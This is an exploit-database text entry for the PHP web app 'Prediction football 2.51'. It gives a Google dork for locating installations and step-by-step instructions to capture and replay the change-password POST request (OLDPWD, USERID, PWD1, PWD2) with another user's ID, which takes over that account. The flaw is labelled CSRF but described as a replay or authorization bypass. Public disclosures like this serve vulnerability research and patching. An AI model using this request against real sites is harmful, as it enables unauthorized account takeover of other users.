exploit-db-mirror/exploits/php/webapps/17666.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

19 lines
No EOL
674 B
Text

# Exploit Title: [title]
# Google Dork: [if relevant] intext:"Prediction football 2.51"
# Date: 08/08/2011
# Author: Smith Falcon
# Software Link: http://www.predictionfootball.com/download/download.html
# Version: 2.51
# Tested on: Linux
First create a username and go to Account Profile
The POST variable in index.php?cmd=changepass is vulnerable to CSRF
Grab Header Information with HTTP Live headers and replay the POST VARIABLE
&OLDPWD=anything&USERID=[id of user u want pwd
changed]&PWD1=[newpass]&PWD2=[newpass]&ChangePwd=Change+Password
REPLAY with new password of the userid and logout!
Now you can login with that desired user and password!